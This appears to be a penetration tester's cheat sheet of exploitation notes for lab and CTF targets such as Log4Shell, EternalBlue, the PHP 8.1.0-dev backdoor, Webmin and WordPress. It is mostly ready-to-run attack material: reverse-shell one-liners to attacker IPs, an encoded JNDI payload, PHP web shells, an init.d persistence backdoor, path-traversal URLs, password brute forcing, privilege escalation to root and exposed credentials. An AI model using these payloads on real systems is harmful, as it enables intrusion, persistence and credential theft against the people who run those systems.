Unifi Log4Shell
Testing, capture auth attempt in burp with creds test:test
Start tcpdump on your host station:
Copy sudo tcpdump -i tun0 port 389
The server will response with invalid payload however it is still connecting back to us, check tcpdump to ensure the connect back
Now install the required packages:
Copy sudo apt update
sudo apt update install openjdk-11-jdk -y
java -version
sudo apt-get install maven
mvn -v After the payload has been created, start the Rogue-JNDI application while passing in the payload as part of the --command option and your tun0 IP address to the --hostname option.
Copy git clone https://github.com/veracode-research/rogue-jndi && cd rogue-jndi && mvn package
echo 'bash -c bash -i >&/dev/tcp/10.10.15.96/9001 0>&1' | base64
java -jar /opt/rogue-jndi/target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTUuOTYvOTAwMSAwPiYxCg==}|{base64,-d}|{bash,-i}" --hostname "10.10.15.96" --hostname is your localhost tun0 interface
Going back to our intercepted POST request, let's change the payload to ${jndi:ldap://{Your Tun0 IP}:1389/o=tomcat} and click Send
Apache Struts2
Copy 80/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
| http-title: Santa Naughty and Nice Tracker
Copy search struts2
exploit(multi/http/struts2_content_type_ognl) Microsoft-ds port 445
445/tcp open miscrosoft-ds
Run the nmap eternal scripts
Copy nmap --script=smb-vuln* $ip
exploit(windows/smb/ms08_067_netapi)
exploit(windows/smb/ms17_010_eternalblue) Wing FTP Server
Gain access to the admin panel
Copy search lua
exploit(windows/ftp/wing_ftp_admin_exec) Mantis Bug Tracker
80/tcp open http mantisbt-2.3.0
Mantis Bug Tracker 2.3.0 - Remote Code Execution (Unauthenticated)
James POP3
110/tcp open POP3
https://www.exploit-db.com/exploits/35513
Copy rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1 | nc 172.16.6.2 3333 >/tmp/f
echo "#!/bin/bash" > /etc/init.d/james
echo "bash -i >& /dev/tcp/172.16.6.2/5555 0>&1" >> /etc/init.d/james
cat /etc/init.d/james
sudo /sbin/reboot Kibana
5601 is the elastic search port, 9200 is the api
Copy curl -X GET "10.10.15.175:9200/_search?q=password&pretty" 130 ⨯
{
"took" : 11,
"timed_out" : false,
"_shards" : {
"total" : 6,
"successful" : 6,
"skipped" : 0,
"failed" : 0
},
"hits" : {
"total" : 1,
"max_score" : 2.0136302,
"hits" : [
{
"_index" : "messages",
"_type" : "_doc",
"_id" : "73",
"_score" : 2.0136302,
"_source" : {
"sender" : "mary",
"receiver" : "wendy",
"message" : "hey, can you access my dev account for me. My username is l33tperson and my password is 9Qs58Ol3AXkMWLxiEyUyyf" If there are log files like on port 8000 which are showing you active kabana logs you can have a LFI vulnerability
Go to the 5601 port and add this extension /api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../.../../../../root.txt
Copy 10.10.156.71:5601/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../.../../../../root.txt Then curl the logs and grep for root.txt
Copy curl -s http://10.10.31.117:8000/kibana-log.txt | grep "root.txt" Also can be used to get a shell in other situations
https://github.com/mpgn/CVE-2018-17246
Sync Breeze Enterprise
Sync Breeze Enterprise v8.9.24
https://www.exploit-db.com/exploits/40456
Copy msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=172.16.6.1 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest Microsoft ds
Copy exploit/windows/smb/ms17_010_eternalblue Android
Copy adb connect [target ip address:port] Joomla versions 3.6.3
Able to use joomra.py in order to create an account and login
Copy python3 joom.py -u jack -p password -e jack@gmail.com http://10.10.10.10 Can read the config files which has the use and password, then can ssh in
XAMPP
Got in through phpmyadmin [root:no password]
Able to get shell through SQL database commands
Copy SELECT "<?php echo shell_exec($_GET['cmd']); ?>" into outfile "C:/xampp/htdocs/xampp/shell.php";
Copy 10.10.10.10/xampp/shell.php?cmd=dir Look for config files with passwords
Copy C:\xampp\htdocs\admin\config.php Lucky GetSimple!
Copy 10.16.1.2/data/users/lucky.xml See the config file and passwd hash with username, crack in john
PE with dirtycow [CVE-2016-5195]
Copy g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil Dolphin Wordpress
Dolphin <7.3.2 Auth bypass / RCE exploit by Ahmed Sultan
Codiad Impresscms
Copy 10.10.10.10/codiad/data/users.php
Copy /config.php
/data
/wordspace Techblog (Wordpress Siteimport Exploit)
Copy http://10.16.1.3/wp-content/plugins/site-import/readme.txt
http://10.16.1.3/wp-content/plugins/site-import/admin/page.php
http://10.16.1.3/wp-content/plugins/site-import/admin/page.php?url=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
http://10.16.1.3/wp-content/plugins/site-import/admin/page.php?url=../../../../../../../../../../etc/passwd
wp-config.php file #has the login creds Backupadmin
Priv Esc on box with Amanda running, view by -LFI Exploit
Copy fileinfo.php?sha1=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
Copy ls -al /usr/lib/amanda
echo '#!/bin/sh
> /bin/sh' > priv.sh
chmod +x priv.sh
/usr/lib/amanada/application/amstar restore --star-path=/tmp/priv.sh
$ whoami
root mysql Brute Force
mysql 3306 running on the target
Copy hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://10.16.1.11
mysql -u root 10.16.1.11 -p
SHOW DATABASES;
SHOW TABLES FROM helpdesk;
USE helpdesk;
SELECT * FROM ost_form_entry; IP Fire 2.15
Brute the admin default [admin:admin]
https://github.com/0xskunk/IPFire-2.15-Shellshock-Exploit/blob/master/SIPS.py
Webmin 1.8.90
MiniServ 1.890 (Webmin httpd)
https://github.com/foxsin34/WebMin-1.890-Exploit-unauthorized-RCE/blob/master/webmin-1.890_exploit.py
Webmin 1.900
MiniServ 1.900 (Webmin httpd)
Requires credentials in order to exploit
can use a metasploit module once credentials are obtained
Copy exploit/linux/http/webmin_packageup_rce
PASSWORD Password6543 yes Webmin Password
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 172.16.1.17 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using
-metasploit.html
RPORT 10000 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Base path for Webmin application
USERNAME admin yes Webmin Username
cmd/unix/reverse_perl
LHOST 10.10.14.2 yes The listen address (an interface may be specified)
LPORT 8888 yes The listen port
run
[*] Started reverse TCP handler on 10.10.14.2:8888
[+] Session cookie: bda1415ad657230f23aac213aa96a878
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (10.10.14.2:8888 -> 10.10.110.3:10784) at 2024-04-13 21:21:53 -0400 init.d linux pe
webserv
NAS4Free -Web shell via the file editor
Pro FTPD 1.3.5
https://github.com/t0kx/exploit-CVE-2015-3306/blob/master/exploit.py
TeamCity Linux Priv Esc
Port was only listening locally so had to port forward in order to be able to browse to it
Copy ssh sys-internal@10.10.250.201 -i id_rsa -L 8111:localhost:8111 TeamCity operates on port 8111 by default
Then could go to localhost:8111 in my browser
Was asked for a authentication token to login as super user
I was able to find a file called catalina.out which reading the contents provided me the authentication token
Copy [TeamCity] Super user authentication token: 8119166573167676780 Once you have gained access Create a new project
Next fill in the build configurations
Next click build steps and use the following command to let /bin/bash run with full root privlages
Back to the command line and run:
Copy /bin/bash -p
whoami
root ClipBucket
File upload vulnerability with authentication
Copy curl --user developers:9972761drmfsls -F "file=@php_reverse_shell.php" -F "plupload=1" -F "name=php_reverse_shell.php" "http://broadcast.vulnnet.thm/actions/photo_uploader.php"
curl --user developers:9972761drmfsls -F "file=@php_reverse_shell.php" -F "plupload=1" -F "name=php_reverse_shell.php" "http://broadcast.vulnnet.thm/actions/beats_uploader.php"
curl --user developers:9972761drmfsls -F "file=@shell.php" -F "plupload=1" -F "name=shell.php" "http://broadcast.vulnnet.thm/actions/beats_uploader.php" Site will tell you the MD5 Hash name of the file and the directory it is located. Make sure to add the .php extension to the end.
PHP 8.1.0-dev
This version of php was backdoored
Detect with nikto or by capturing the server response in burp
X-Powered-By: PHP 8/1/0/dev --> what you are looking for
Capture a request in burp suite
Add additional User-Agentt header to the request (yes it is supposed to be spelled with two t's)
Copy User-Agentt: zerodiumsystem('bash -c "bash -i >& /dev/tcp/10.10.14.13/9001 0>&1"'); Open Net Admin (ona)
Metasploit module for CMD injection 18.1.1
Database file with credentials is located here:
Copy /opt/ona/www/local/config/database_settings.inc.php Wordpress HelloDolly Plugin
Copy https://yebberdog.medium.com/try-hack-me-jack-walkthrough-904035594dc2
- craft shell from hacktricks
- from revshells.com
<?php $sock=fsockopen("10.10.14.2",80);passthru("/bin/bash <&3 >&3 2>&3"); ?>
- update dolly code
File edited successfully.
- now activate it
<?php if(isset($_REQUEST["cmd"])){ echo "<pre>"; $cmd = ($_REQUEST["cmd"]); system($cmd); echo "</pre>"; die; }?>
http://10.10.110.100:65000/wordpress/wp-content/plugins/hello.php?cmd=id
- code execution...
uid=33(www-data) gid=33(www-data) groups=33(www-data) 
